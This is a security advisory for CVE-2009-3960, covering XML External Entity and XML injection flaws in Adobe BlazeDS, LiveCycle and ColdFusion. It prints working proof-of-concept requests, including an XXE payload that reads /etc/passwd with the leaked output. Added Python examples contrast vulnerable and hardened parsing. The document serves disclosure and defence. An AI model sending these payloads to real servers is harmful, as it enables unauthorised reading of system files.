( , ) (,
. `.' ) ('. ',
). , ('. ( ) (
(_,) .`), ) _ _,
/ _____/ / _ / ____ ____ _____
/____ /==/ /_/ / _/ ___// _ / / /
/ // | // /__( <_> ) Y Y /
/______ //___|__ / /___ >____/|__|_| /
// //.-. // //:wq
(x.0)
'=.|w|.='
_='`"``=.
presents..
Multiple Adobe Products
XML External Entity And XML Injection Vulnerabilities
CVE: CVE-2009-3960
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html
Link:
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+-----------+
|Description|
+-----------+
Security-Assessment.com discovered that multiple Adobe
products with different Data Services versions are
vulnerable to XML External Entity (XXE) and XML
injection attacks.
XML external entity injection enables a wide range of
XML-based attacks, including local file disclosure,
TCP port scans launched from the server (by pointing
an external entity at internal hosts and ports) and
denial of service through recursive entity expansion,
attribute blow-up and similar techniques.
For more information about the implications of this
vulnerability, refer to RFC 2518, section 17.7
(Implications of XML External Entities):
http://www.ietf.org/rfc/rfc2518.txt
+--------------+
|Product Review|
+--------------+
Adobe Data Services components provide Flex/RIA
applications with data messaging, remoting and
management capabilities.
The discovered vulnerabilities affect the HTTPChannel
servlet classes, “mx.messaging.channels.HTTPChannel”
and “mx.messaging.channels.SecureHTTPChannel”. These
classes are part of the Data Services Messaging
classes and ship in the flex-messaging-common.jar
Java archive.
The HTTPChannel transports data in the AMFX format,
which is the text-based XML representation of AMF.
The HTTPChannel endpoints are defined in the
services-config.xml file, located within the
Flex/WEB-INF folder of the application.
By default, the HTTPChannel classes are mapped to
the following endpoints:
1. http://{server.name}:{server.port}/{context.root}/messagebroker/http
2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure
Note that the HTTPChannel may be mapped to different
endpoints.
This depends on the deployed application and the
framework in use (e.g. BlazeDS, Adobe LiveCycle
Data Services, etc.).
+--------------------------------------------+
|Exploitation - XML External Entity Injection|
+--------------------------------------------+
XML entities can be declared in a DOCTYPE and referenced
within AMFX requests passed to the HTTPChannel. The XML
parser behind the channel processes the DOCTYPE and
expands the injected entities, including external
(SYSTEM) ones.
The following request/response pair shows an XML
external entity injection that leads to local file
disclosure. The entity reference is placed in the
messageId field of a CommandMessage; the server expands
it and echoes the result back as the correlationId of
the AcknowledgeMessage. The AMFX request is sent via
the HTTPChannel endpoint in BlazeDS.
XML External Entity Injection – Local File Disclosure
PoC – BlazeDS – Request
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
XML External Entity Injection – Local File Disclosure
PoC – BlazeDS – Response
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">
<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>
<body targetURI="/onResult" responseURI="">
<object type="flex.messaging.messages.AcknowledgeMessage">
<traits><string>timestamp</string><string>headers</string>
<string>body</string><string>correlationId</string>
<string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string>
</traits><double>1.257387140632E12</double><object>
<traits><string>DSMessagingVersion</string>
<string>DSId</string></traits><double>1.0</double>
<string>BDE929FE-270D-3B56-1061-616E8B938429</string>
</object><null/><string>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
[...]
The above injection was successfully tested on
multiple Adobe products, as shown below:
1. Product: Adobe BlazeDS 3.2.0.39
   Linux Ubuntu 9.04 / Tomcat 6.0.14
   Endpoint URIs:
   {server.name}:{server.port}/{context.root}/messagebroker/http
   {server.name}:{server.port}/{context.root}/messagebroker/httpsecure
   Methods: POST, GET
   Protocols: HTTP, HTTPS
2. Product: Adobe LiveCycle Data Services ES2 3.0
   Windows XP SP2 / Tomcat 6.0.14
   Endpoint URIs:
   {server.name}:{server.port}/{context.root}/messagebroker/http
   {server.name}:{server.port}/{context.root}/messagebroker/httpsecure
   Methods: POST, GET
   Protocols: HTTP, HTTPS
3. Product: ColdFusion 9.0
   Windows XP SP2 / Tomcat 6.0.14
   Endpoint URIs:
   {server.name}:{server.port}/{context.root}/flex2gateway/http
   {server.name}:{server.port}/{context.root}/flex2gateway/httpsecure
   Methods: POST, GET
   Protocols: HTTP, HTTPS
4. Product: Adobe LiveCycle ES2
   Windows XP SP2 / IBM WebSphere 7.0
   Endpoint URIs:
   {server.name}:{server.port}/{context.root}/messagebroker/http
   {server.name}:{server.port}/{context.root}/messagebroker/httpsecure
   Methods: POST, GET
   Protocols: HTTP, HTTPS
The vendor has released several patches for this
vulnerability. See the Solution section of this
document for more information.
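The following is an added example, not code from the advisory or from Adobe. It rebuilds the AMFX CommandMessage request shown above (with the external entity pointing at a path of your choice) and runs it through Python's expat parser in three configurations: one that fetches SYSTEM entities, as the vulnerable HTTPChannel parser evidently did; one that leaves external entities unexpanded; and one that refuses any DOCTYPE and fails closed. The "secret" file is a constructed stand-in for /etc/passwd written to a temporary file, so the example runs offline and contacts no endpoint. The function names, the MESSAGE_ID_INDEX constant and the demo() wrapper are this example's own.

```python
"""Replay the AMFX XXE PoC through expat in three parser configurations.
Added example; not code from the advisory or from Adobe."""
import os
import tempfile
import xml.parsers.expat as expat

AMFX_NS = "http://www.macromedia.com/2005/amfx"

# Position of the CommandMessage messageId value among the <string>
# elements of the request built below: 9 trait names, 2 empty strings,
# DSId, DSMessagingVersion, "nil", then the entity reference.
MESSAGE_ID_INDEX = 14


def build_amfx_xxe(path: str, entity: str = "x3") -> bytes:
    """Rebuild the advisory's CommandMessage request with the external
    entity pointing at `path`. The reference sits in the messageId field,
    which the AcknowledgeMessage echoes back as correlationId."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY {entity} SYSTEM "{path}"> ]>
<amfx ver="3" xmlns="{AMFX_NS}">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits /></object>
<null /><string /><string />
<object><traits><string>DSId</string><string>DSMessagingVersion</string></traits>
<string>nil</string><int>1</int></object>
<string>&{entity};</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>""".encode("utf-8")


def parse_amfx_strings(data: bytes, resolve_external: bool = False,
                       reject_doctype: bool = False) -> list:
    """Return the text of every <string> element in document order.

    resolve_external=True models the vulnerable parser, which reads the
    SYSTEM identifier from disk; False makes the reference expand to
    nothing; reject_doctype=True refuses any DOCTYPE and fails closed."""
    parser = expat.ParserCreate()
    values, buf = [], []
    in_string = False

    def start(name, attrs):
        nonlocal in_string
        if name == "string":
            in_string = True
            del buf[:]

    def end(name):
        nonlocal in_string
        if name == "string":
            values.append("".join(buf))
            in_string = False

    def chars(text):
        if in_string:
            buf.append(text)

    def doctype(name, sysid, pubid, has_internal_subset):
        if reject_doctype:
            raise ValueError("DOCTYPE is not allowed in an AMFX request")

    def external_entity(context, base, sysid, pubid):
        if not resolve_external:
            return 1  # skipped: expat emits no text for the reference
        # Vulnerable behaviour: read the SYSTEM identifier from disk and
        # parse it as the entity's replacement text. The child parser
        # shares the handlers, so the file content flows into <string>.
        child = parser.ExternalEntityParserCreate(context)
        with open(sysid, "rb") as fh:
            child.Parse(fh.read(), True)
        return 1

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.StartDoctypeDeclHandler = doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.Parse(data, True)
    return values


def demo() -> dict:
    """Replay the PoC against a constructed secret file and report what
    each parser configuration exposed in the messageId field."""
    secret = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    fd, path = tempfile.mkstemp(suffix=".txt")  # constructed /etc/passwd stand-in
    with os.fdopen(fd, "w", newline="\n") as fh:
        fh.write(secret)
    try:
        request = build_amfx_xxe(path)
        vulnerable = parse_amfx_strings(request, resolve_external=True)
        skipped = parse_amfx_strings(request, resolve_external=False)
        try:
            parse_amfx_strings(request, reject_doctype=True)
            rejected = False
        except ValueError:
            rejected = True
    finally:
        os.unlink(path)
    return {
        "vulnerable_message_id": vulnerable[MESSAGE_ID_INDEX],
        "skipped_message_id": skipped[MESSAGE_ID_INDEX],
        "doctype_rejected": rejected,
        "leaked": "root:x:0:0" in vulnerable[MESSAGE_ID_INDEX],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Skipping external entities is enough to stop the file disclosure, but a DOCTYPE that is never processed also removes the internal-subset DoS vectors (recursive entity expansion, attribute blow-up) mentioned in the Description, which is why rejecting the DOCTYPE outright is the configuration to prefer for a protocol such as AMFX that never legitimately carries one.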
+----------------------------+
|Exploitation - XML Injection|
+----------------------------+
The XML parser lacks proper input and output
validation controls. Security-Assessment.com managed
to inject arbitrary XML content which was returned
in the XML response.
The following request/response pair shows an XML
injection in the BlazeDS HTTPChannel. The value of the
“responseURI” attribute is reflected unescaped into
the “targetURI” attribute of the response <body>
element, so a double quote terminates the attribute
value and whatever follows (here an extra
“injectedattr” attribute) becomes part of the
response markup.
XMLInjection – BlazeDS - Request
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf

<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/>
</body></amfx>
XMLInjection – BlazeDS - Response
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>
The above injection was successfully tested on
multiple Adobe products, as shown below:
1. Product: Adobe BlazeDS 3.2.0.39
   Linux Ubuntu 9.04 / Tomcat 6.0.14
   Endpoint URIs:
   {server.name}:{server.port}/{context.root}/messagebroker/http
   {server.name}:{server.port}/{context.root}/messagebroker/httpsecure
   Methods: POST, GET
   Protocols: HTTP, HTTPS
2. Product: Adobe LiveCycle Data Services ES2 3.0
   Windows XP SP2 / Tomcat 6.0.14
   Endpoint URIs:
   {server.name}:{server.port}/{context.root}/messagebroker/http
   {server.name}:{server.port}/{context.root}/messagebroker/httpsecure
   Methods: POST, GET
   Protocols: HTTP, HTTPS
3. Product: ColdFusion 9.0
   Windows XP SP2 / Tomcat 6.0.14
   Endpoint URIs:
   {server.name}:{server.port}/{context.root}/flex2gateway/http
   {server.name}:{server.port}/{context.root}/flex2gateway/httpsecure
   Methods: POST, GET
   Protocols: HTTP, HTTPS
4. Product: Adobe LiveCycle ES2
   Windows XP SP2 / IBM WebSphere 7.0
   Endpoint URIs:
   {server.name}:{server.port}/{context.root}/messagebroker/http
   {server.name}:{server.port}/{context.root}/messagebroker/httpsecure
   Methods: POST, GET
   Protocols: HTTP, HTTPS
The vendor has released several patches for this
vulnerability. See the Solution section of this
document for more information.
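The following is an added example, not BlazeDS code, modelling the reflection seen in the XML injection PoC above. reflect_unsafe() concatenates the client-supplied responseURI straight into the <body> start tag, which reproduces the shape of the response the advisory shows; reflect_safe() builds the same reply through an XML serializer, so the identical payload comes back as a single escaped attribute value. body_attributes() parses a reply the way a client would, and the second payload in demo() shows the other failure mode of string-built XML: a reply that is no longer well-formed. The function names and the payloads are this example's own.

```python
"""Reflected AMFX reply: string concatenation beside a serializer.
Added example; not code from the advisory or from Adobe."""
import xml.etree.ElementTree as ET

# The advisory's payload: the quote closes the attribute value and the
# remainder is parsed as a new attribute on the <body> element.
PAYLOAD = 'd" injectedattr="anything'


def reflect_unsafe(response_uri: str) -> str:
    """String-built reply; the value lands verbatim in targetURI."""
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            '<amfx ver="3"><body targetURI="%s" responseURI="">'
            '<null/></body></amfx>' % response_uri)


def reflect_safe(response_uri: str) -> str:
    """Serializer-built reply; '"', '<' and '&' are escaped in the value."""
    amfx = ET.Element("amfx", ver="3")
    body = ET.SubElement(amfx, "body", targetURI=response_uri, responseURI="")
    ET.SubElement(body, "null")
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            + ET.tostring(amfx, encoding="unicode"))


def body_attributes(reply: str) -> dict:
    """Parse a reply as a client would and return the <body> attributes.
    Raises ET.ParseError when the reflection broke well-formedness."""
    root = ET.fromstring(reply)
    return dict(root.find("body").attrib)


def demo() -> dict:
    """Run both builders on the advisory payload and a markup-breaking one."""
    unsafe = body_attributes(reflect_unsafe(PAYLOAD))
    safe = body_attributes(reflect_safe(PAYLOAD))
    try:
        # Constructed payload: opens a child element and a second start tag,
        # leaving the reply with a mismatched </body>.
        body_attributes(reflect_unsafe('d"><evil/><x a="'))
        broken = False
    except ET.ParseError:
        broken = True
    return {"unsafe": unsafe, "safe": safe, "unsafe_breaks_parser": broken}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

With the serializer, targetURI is reflected as d&quot; injectedattr=&quot;anything and parses back to exactly the submitted string; no new attribute appears and the document stays well-formed. Whether the reflected value should be accepted at all is a separate input-validation decision (a responseURI that is not a plain URI path has no legitimate use), but escaping at the output boundary is what stops the injection regardless of that decision.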
+--------+
|Solution|
+--------+
Security-Assessment.com follows responsible
disclosure and promptly contacted the vendor after
discovering the issues. The vendor was contacted on
the 6th November 2009 and a reply was received on the
same day. The vendor released security patches on
the 11th February 2010.
The security patches can be downloaded at the
following website:
http://www.adobe.com/support/security/bulletins/apsb10-05.html
+------+
|Credit|
+------+
Discovered and advised to Adobe in
November 2009 by Roberto Suggi Liverani of Security-
Assessment.com. Personal Page: http://malerisch.net/
For full details regarding this vulnerability
download the PDF from our website:
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+---------+
|Greetings|
+---------+
Bug found at Hack in The Sun 2009, Waiheke Island.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a New Zealand based world
leader in web application testing, network security
and penetration testing. Security-Assessment.com
services organisations across New Zealand, Australia,
Asia Pacific, the United States and the United
Kingdom.
Roberto Suggi Liverani